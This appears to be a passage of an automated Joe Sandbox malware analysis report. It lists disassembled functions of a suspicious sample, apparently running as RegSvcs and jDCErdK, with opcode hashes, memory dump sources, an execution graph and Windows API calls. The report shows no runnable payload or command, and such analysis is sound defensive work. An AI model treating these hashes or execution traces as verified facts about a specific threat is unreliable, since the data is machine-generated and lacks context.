                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0514e38223c4362a73d5801c4f032c4932746ad070552055ebe7c6353626be8a
                                              • Instruction ID: 476a584cdc81e72111010b8b8e7f303490dad52fca3537f1c58d403090c0092a
                                              • Opcode Fuzzy Hash: 0514e38223c4362a73d5801c4f032c4932746ad070552055ebe7c6353626be8a
                                              • Instruction Fuzzy Hash: 3A213934B00209CFDB58EB79D558AAD7BF5AF8D308B104469E506EB3A8DB369D00CB94
                                              Function 0131148A Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 549a8a3d43b9704027d88967beaa4dd25b25e2757c6860347296be91089e13d8
                                              • Instruction ID: 543c39894ab45bbd9e5058a2e0960b9f0decda12336e96b72e918e1468e0a3d2
                                              • Opcode Fuzzy Hash: 549a8a3d43b9704027d88967beaa4dd25b25e2757c6860347296be91089e13d8
                                              • Instruction Fuzzy Hash: FE11E231A01219CFCF2AAFB888552EE7BB5EB18219B140179E902EB305EB35C841CB95
                                              Function 01310838 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 62d6712cd1714c76ad4929f1f0f8713e6bfa95c1a9ac658221301c5828dd3803
                                              • Instruction ID: 6f2f20feee0a633b8a7b316032abe765267afeb29179fa8bc9e808f7f9644c5f
                                              • Opcode Fuzzy Hash: 62d6712cd1714c76ad4929f1f0f8713e6bfa95c1a9ac658221301c5828dd3803
                                              • Instruction Fuzzy Hash: D011C630B053045BEF2E667DD95436E7A95E785318F10497AF802DB29AEA61C8C58BC2
                                              Function 01310848 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf7698fc195c267e188ce823437fa5f7e3ada6bc0a0eac6e5fb9b6c791c7ba87
                                              • Instruction ID: 8f81dc6b342df6ac2dbea5a84f3a3c30424bd73138dea948caaec60dccf92860
                                              • Opcode Fuzzy Hash: cf7698fc195c267e188ce823437fa5f7e3ada6bc0a0eac6e5fb9b6c791c7ba87
                                              • Instruction Fuzzy Hash: EE11C430B042045FEF2DAA7DD84476E7A95FB45318F20497AF406DB35ADA61CCC58BC1
                                              Function 01311498 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd5e4ae2d4643b2674eff1a6a0069fd02439956651afa8f71eb685577e0f2712
                                              • Instruction ID: fa8116d7045620b6c050aac6b654fc8e9b27c3d36a39301c62c390764180441b
                                              • Opcode Fuzzy Hash: bd5e4ae2d4643b2674eff1a6a0069fd02439956651afa8f71eb685577e0f2712
                                              • Instruction Fuzzy Hash: 61018031A012198FCB29EFBD84512EE7BF5EB58215B140479E906E7305EB35D881CBD5
                                              Function 0131A6C5 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35ac15b151ec39790401a9b6bad261e3980584acd15f3a8c4b6471473de9b9c5
                                              • Instruction ID: db0b51964d03fba9eab755d4fa94d1594e4d798e02e0cbfa3239bac21fab2d1e
                                              • Opcode Fuzzy Hash: 35ac15b151ec39790401a9b6bad261e3980584acd15f3a8c4b6471473de9b9c5
                                              • Instruction Fuzzy Hash: 7A015231A101058FDB14DF99D98479ABB71FF84311F54C264D9085B29AD770AD45CBA1
                                              Function 01318F08 Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4aa20f9576ecb8d5dae0f048e679dcc912ca835189c5185180577d5276776915
                                              • Instruction ID: 3888933e08a713faf2878c66255f0924e3ab4c5484f4a8b702de3c03a84f34e2
                                              • Opcode Fuzzy Hash: 4aa20f9576ecb8d5dae0f048e679dcc912ca835189c5185180577d5276776915
                                              • Instruction Fuzzy Hash: 1C01627491020AAFCF41EFB9FA4179DBFB2EB44300F10467AC00697268EB319E499B50
                                              Function 01317EA8 Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5a170d1f5fc4825841b85daf9af7fa31deeb40cbdbb994ecbae774a3452bedf
                                              • Instruction ID: 4eb8dae142ab68022cba8033f0f3faacb87d9c37b0da95cbe5718f679b12c26b
                                              • Opcode Fuzzy Hash: d5a170d1f5fc4825841b85daf9af7fa31deeb40cbdbb994ecbae774a3452bedf
                                              • Instruction Fuzzy Hash: EBF0C435B40218CFCB14EB75D598A6C77B2EF88625F6084A8E5069B3A8DB31AD52CB40
                                              Function 01318F18 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 28b3219fccc3aad3175ecd39c319800f76789f480ed7e542626d414890ec7fcc
                                              • Instruction ID: a56cfbeb44672031250701968c0fff1df758b31e2d8a7173a411213584adc8a5
                                              • Opcode Fuzzy Hash: 28b3219fccc3aad3175ecd39c319800f76789f480ed7e542626d414890ec7fcc
                                              • Instruction Fuzzy Hash: 23F0FF3495021AEFCF41FFA9FA4169DBBB6FB44700F10467AC00597268EF31AE489B91
                                              Function 0131A957 Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 10d47ed52f292e7d5df3fe4dc01c1fb0c229cad3e4aaa0b15068c55b84f7bcc1
                                              • Instruction ID: 0d883fd1665ea97440fc341b977e15f83dfecaf0b9808bafaee4b1257b15e2f8
                                              • Opcode Fuzzy Hash: 10d47ed52f292e7d5df3fe4dc01c1fb0c229cad3e4aaa0b15068c55b84f7bcc1
                                              • Instruction Fuzzy Hash: 70B0120101F7C02AC79313211C163C23E508B83144F29009F40CA58042E00041054F23

                                              Execution Graph

                                              Execution Coverage:8.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:55
                                              Total number of Limit Nodes:4
                                              execution_graph 14975 1094668 14976 109467a 14975->14976 14977 1094686 14976->14977 14979 1094779 14976->14979 14980 109479d 14979->14980 14984 1094878 14980->14984 14988 1094888 14980->14988 14981 10947a7 14981->14977 14987 1094888 14984->14987 14985 109498c 14985->14981 14987->14985 14992 10944b0 14987->14992 14990 10948af 14988->14990 14989 109498c 14989->14981 14990->14989 14991 10944b0 CreateActCtxA 14990->14991 14991->14989 14993 1095918 CreateActCtxA 14992->14993 14995 10959db 14993->14995 14996 109d751 14997 109d714 DuplicateHandle 14996->14997 14999 109d75a 14996->14999 14998 109d726 14997->14998 15000 109acb0 15001 109acbf 15000->15001 15004 109ada8 15000->15004 15012 109ad97 15000->15012 15005 109adb9 15004->15005 15006 109addc 15004->15006 15005->15006 15020 109b030 15005->15020 15024 109b040 15005->15024 15006->15001 15007 109add4 15007->15006 15008 109afe0 GetModuleHandleW 15007->15008 15009 109b00d 15008->15009 15009->15001 15013 109adb9 15012->15013 15015 109addc 15012->15015 15013->15015 15018 109b030 LoadLibraryExW 15013->15018 15019 109b040 LoadLibraryExW 15013->15019 15014 109add4 15014->15015 15016 109afe0 GetModuleHandleW 15014->15016 15015->15001 15017 109b00d 15016->15017 15017->15001 15018->15014 15019->15014 15021 109b054 15020->15021 15022 109b079 15021->15022 15028 109a130 15021->15028 15022->15007 15025 109b054 15024->15025 15026 109b079 15025->15026 15027 109a130 LoadLibraryExW 15025->15027 15026->15007 15027->15026 15029 109b220 LoadLibraryExW 15028->15029 15031 109b299 15029->15031 15031->15022 15032 109d040 15033 109d086 GetCurrentProcess 15032->15033 15035 109d0d8 GetCurrentThread 15033->15035 15036 109d0d1 15033->15036 15037 109d10e 15035->15037 15038 109d115 GetCurrentProcess 15035->15038 15036->15035 15037->15038 15039 109d14b 15038->15039 15040 109d173 GetCurrentThreadId 15039->15040 15041 109d1a4 15040->15041

                                              Executed Functions

                                              Function 0109D031 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 109d031-109d0cf GetCurrentProcess 298 109d0d8-109d10c GetCurrentThread 294->298 299 109d0d1-109d0d7 294->299 300 109d10e-109d114 298->300 301 109d115-109d149 GetCurrentProcess 298->301 299->298 300->301 303 109d14b-109d151 301->303 304 109d152-109d16d call 109d618 301->304 303->304 307 109d173-109d1a2 GetCurrentThreadId 304->307 308 109d1ab-109d20d 307->308 309 109d1a4-109d1aa 307->309 309->308
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0109D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0109D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0109D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0109D191
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 5cf04a21f1f84297ce3b39dcbacece0a996ad1ee7182bb372ffc4fa3e88f09c0
                                              • Instruction ID: dc06d74dddae99128644e12fc9c28c366546d8727aa3b2c717d56a53209197cf
                                              • Opcode Fuzzy Hash: 5cf04a21f1f84297ce3b39dcbacece0a996ad1ee7182bb372ffc4fa3e88f09c0
                                              • Instruction Fuzzy Hash: 695133B19003498FDB58DFA9D548BDEBBF1AF89304F20C469E449A73A0DB349984CF65
                                              Function 0109D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 316 109d040-109d0cf GetCurrentProcess 320 109d0d8-109d10c GetCurrentThread 316->320 321 109d0d1-109d0d7 316->321 322 109d10e-109d114 320->322 323 109d115-109d149 GetCurrentProcess 320->323 321->320 322->323 325 109d14b-109d151 323->325 326 109d152-109d16d call 109d618 323->326 325->326 329 109d173-109d1a2 GetCurrentThreadId 326->329 330 109d1ab-109d20d 329->330 331 109d1a4-109d1aa 329->331 331->330
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0109D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0109D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0109D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0109D191
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: f88c219559c87a04535fad1f85d5fd9421d79770ad2df10454525db8ff302df3
                                              • Instruction ID: 8f0938e9423a69bd143c08bc50cd69a125b22098e1d05d94e732675ecc66a64f
                                              • Opcode Fuzzy Hash: f88c219559c87a04535fad1f85d5fd9421d79770ad2df10454525db8ff302df3
                                              • Instruction Fuzzy Hash: 455134B19003098FDB58DFA9D548B9EBBF1EF88304F20C459E449A73A0DB349984CF65
                                              Function 0109ADA8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 360 109ada8-109adb7 361 109adb9-109adc6 call 109a0cc 360->361 362 109ade3-109ade7 360->362 367 109adc8 361->367 368 109addc 361->368 363 109ade9-109adf3 362->363 364 109adfb-109ae3c 362->364 363->364 371 109ae49-109ae57 364->371 372 109ae3e-109ae46 364->372 415 109adce call 109b030 367->415 416 109adce call 109b040 367->416 368->362 374 109ae59-109ae5e 371->374 375 109ae7b-109ae7d 371->375 372->371 373 109add4-109add6 373->368 376 109af18-109afd8 373->376 377 109ae69 374->377 378 109ae60-109ae67 call 109a0d8 374->378 379 109ae80-109ae87 375->379 410 109afda-109afdd 376->410 411 109afe0-109b00b GetModuleHandleW 376->411 383 109ae6b-109ae79 377->383 378->383 381 109ae89-109ae91 379->381 382 109ae94-109ae9b 379->382 381->382 386 109aea8-109aeaa call 109a0e8 382->386 387 109ae9d-109aea5 382->387 383->379 390 109aeaf-109aeb1 386->390 387->386 391 109aebe-109aec3 390->391 392 109aeb3-109aebb 390->392 394 109aee1-109aeee 391->394 395 109aec5-109aecc 391->395 392->391 400 109af11-109af17 394->400 401 109aef0-109af0e 394->401 395->394 396 109aece-109aede call 109a0f8 call 109a108 395->396 396->394 401->400 410->411 412 109b00d-109b013 411->412 413 109b014-109b028 411->413 412->413 415->373 416->373
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFFE
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f2c7bdf1a47819062a9c099e01a08d695a3a71e44d5d0ef64eda6d904e2ecadf
                                              • Instruction ID: bc6f6ea481f876d3e94a8b22d26e1e270fcd0b85f4782e0357a22671cccb6299
                                              • Opcode Fuzzy Hash: f2c7bdf1a47819062a9c099e01a08d695a3a71e44d5d0ef64eda6d904e2ecadf
                                              • Instruction Fuzzy Hash: 2E7135B0A00B05CFDB64DF2AD06479ABBF1BF88304F108A6DE086D7A50D735E845CB90
                                              Function 0109590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 417 109590d-1095913 418 109591c-10959d9 CreateActCtxA 417->418 420 10959db-10959e1 418->420 421 10959e2-1095a3c 418->421 420->421 428 1095a4b-1095a4f 421->428 429 1095a3e-1095a41 421->429 430 1095a51-1095a5d 428->430 431 1095a60 428->431 429->428 430->431 432 1095a61 431->432 432->432
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 010959C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: ac77e42fa2e66eb13dc8bf84aec7bef8685ec972c027225ba1c156ec99668252
                                              • Instruction ID: d4bc70eb73b6ae6db62d6e2239fc32e9da80e625f498703ac4529fda9aedaca4
                                              • Opcode Fuzzy Hash: ac77e42fa2e66eb13dc8bf84aec7bef8685ec972c027225ba1c156ec99668252
                                              • Instruction Fuzzy Hash: 7D41DFB1C00719CEDB24CFAAC8847CDBBF5BF48304F2481AAD448AB255DB796985CF90
                                              Function 010944B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 434 10944b0-10959d9 CreateActCtxA 437 10959db-10959e1 434->437 438 10959e2-1095a3c 434->438 437->438 445 1095a4b-1095a4f 438->445 446 1095a3e-1095a41 438->446 447 1095a51-1095a5d 445->447 448 1095a60 445->448 446->445 447->448 449 1095a61 448->449 449->449
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 010959C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: f1df8a376ca4f0ee6be059e77b8981cf583c3b26a85ff3b50754459d3f3aa5ee
                                              • Instruction ID: 33c8beb27cfaadf4dec67136dfde80a15107085af5729525ab868afa8094fd09
                                              • Opcode Fuzzy Hash: f1df8a376ca4f0ee6be059e77b8981cf583c3b26a85ff3b50754459d3f3aa5ee
                                              • Instruction Fuzzy Hash: B641C2B0C00719CBDB24DFAAC844B9DBBF5BF49304F24806AD448AB255DB756985CF90
                                              Function 0109D751 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 451 109d751-109d758 452 109d75a-109d87e 451->452 453 109d714-109d724 DuplicateHandle 451->453 454 109d72d-109d74a 453->454 455 109d726-109d72c 453->455 455->454
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D717
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 060006f1c80be2207dde1b65355497622595a6ea4c3ba9b4bb561eadf85d913c
                                              • Instruction ID: 0604ae92a321285a9e48c3b39979f9a7fc501b98a5c3d767e0e0ac913bba6ce0
                                              • Opcode Fuzzy Hash: 060006f1c80be2207dde1b65355497622595a6ea4c3ba9b4bb561eadf85d913c
                                              • Instruction Fuzzy Hash: B4315275A413808FE714AF60F4597693BA2FB88310F11853AE9158B7D8EBB84885CF51
                                              Function 0109D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 469 109d690-109d724 DuplicateHandle 470 109d72d-109d74a 469->470 471 109d726-109d72c 469->471 471->470
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D717
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: c7c18445ae463d6cfe0dda799b004cd44278f882711756e0cc9c4dc28a5db58a
                                              • Instruction ID: 5c0fe0a96cdf5f1e1c6a17bcea73bf80a28be32daa446116d23d2929eea9852b
                                              • Opcode Fuzzy Hash: c7c18445ae463d6cfe0dda799b004cd44278f882711756e0cc9c4dc28a5db58a
                                              • Instruction Fuzzy Hash: F621E4B59002489FDB10CF9AD584ADEFFF4FB48310F14801AE954A3310D374A940CFA4
                                              Function 0109D689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 474 109d689-109d724 DuplicateHandle 475 109d72d-109d74a 474->475 476 109d726-109d72c 474->476 476->475
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109D717
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a8eab752269d4c6878a85136993112cf93c15e53e99185c63a8b7066a90a1a69
                                              • Instruction ID: 92e22d50e259a2d15d384380e7fecad4e5baedd8f4a44b12dda9a220b138cfb4
                                              • Opcode Fuzzy Hash: a8eab752269d4c6878a85136993112cf93c15e53e99185c63a8b7066a90a1a69
                                              • Instruction Fuzzy Hash: F821E2B59002589FDB10CFA9D584AEEFFF4FB48314F14842AE958A3310D378A940CFA4
                                              Function 0109A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 479 109a130-109b260 481 109b268-109b297 LoadLibraryExW 479->481 482 109b262-109b265 479->482 483 109b299-109b29f 481->483 484 109b2a0-109b2bd 481->484 482->481 483->484
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B079,00000800,00000000,00000000), ref: 0109B28A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1b0517bf84f2ca64ac7083fdbeb30af3966ac2f76d8efd98b6b07bbd7c030d75
                                              • Instruction ID: ddbad9ebbcf6ee112599fa98088b6e9defebf9b72e39e8bcba8c77f9048de224
                                              • Opcode Fuzzy Hash: 1b0517bf84f2ca64ac7083fdbeb30af3966ac2f76d8efd98b6b07bbd7c030d75
                                              • Instruction Fuzzy Hash: 091123B69003089FDB10CF9AD444ADEFBF4EB88320F10846AE559A7250C375A945CFA4
                                              Function 0109B218 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 487 109b218-109b260 488 109b268-109b297 LoadLibraryExW 487->488 489 109b262-109b265 487->489 490 109b299-109b29f 488->490 491 109b2a0-109b2bd 488->491 489->488 490->491
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B079,00000800,00000000,00000000), ref: 0109B28A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1b4345065484ff0b7a784736642a9b8171e5d60bef612e16d12c40c10d5f2609
                                              • Instruction ID: 280b828e5eb8d89c64de28b23a077d5defd1be10b5f35ad388dc6a9d7efa9b3b
                                              • Opcode Fuzzy Hash: 1b4345065484ff0b7a784736642a9b8171e5d60bef612e16d12c40c10d5f2609
                                              • Instruction Fuzzy Hash: 221120B68003098FDB14CFAAD584ADEFBF4EF48320F14846AD559A7210C379A545CFA4
                                              Function 0109AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 494 109af98-109afd8 495 109afda-109afdd 494->495 496 109afe0-109b00b GetModuleHandleW 494->496 495->496 497 109b00d-109b013 496->497 498 109b014-109b028 496->498 497->498
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0109AFFE
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1090000_jDCErdK.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d37f91c9a28b84599ba4a1006ea8800aeaa781481cb1e3e1c73bf34c6a5e0cc0
                                              • Instruction ID: 80653a83d89ebb3b169eb85d7e07054d35b2e196e8e855f06ef91004bf9ab0f9
                                              • Opcode Fuzzy Hash: d37f91c9a28b84599ba4a1006ea8800aeaa781481cb1e3e1c73bf34c6a5e0cc0
                                              • Instruction Fuzzy Hash: BF110FB6C002498FDB10CF9AD444ADEFBF4AF88324F10846AD568A7210D379A545CFA5
                                              Function 0103D68C Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b478acb41d6e35150babe199a6e17ccf4f913dcb5788893ddceb14196095240c
                                              • Instruction ID: 73e1c882a7b4d51372d212b719ae363beabc241068c4299dc481886a9ddd48f7
                                              • Opcode Fuzzy Hash: b478acb41d6e35150babe199a6e17ccf4f913dcb5788893ddceb14196095240c
                                              • Instruction Fuzzy Hash: EF213871100280DFCB069F54D9C4B1ABFA9FBC8314F6086A9E9890B256C336C416CB61
                                              Function 0103D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 309d47d8d4266424f26ecbcde6ec25b040e377fb58eaa6ce7c3e4e6e73744e8d
                                              • Instruction ID: 814305526fa616d892e9c51504475fc97c92e9484ae38cc316f5a6a34ccb22b2
                                              • Opcode Fuzzy Hash: 309d47d8d4266424f26ecbcde6ec25b040e377fb58eaa6ce7c3e4e6e73744e8d
                                              • Instruction Fuzzy Hash: 7F214571500200DFDB01DF58D9C0B6ABFA9FBC8324F60C1A9E9490B256C736E456CBA1
                                              Function 0104D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cef8a39b8cb8b5e4319ef6af14a6365c3f182e9fc8e9e7118fc9f0bd6f03bebd
                                              • Instruction ID: 6b4fe3a4733f3ec250aa5899b1bebde4bd77681ab4f2b75bea15823bc13e8da7
                                              • Opcode Fuzzy Hash: cef8a39b8cb8b5e4319ef6af14a6365c3f182e9fc8e9e7118fc9f0bd6f03bebd
                                              • Instruction Fuzzy Hash: 58212CB1504200EFDB05DF54D6C4B16BBA5FBA4324F20C6BDE9894B356C336D446CB61
                                              Function 0104D01C Relevance: .1, Instructions: 72COMMON
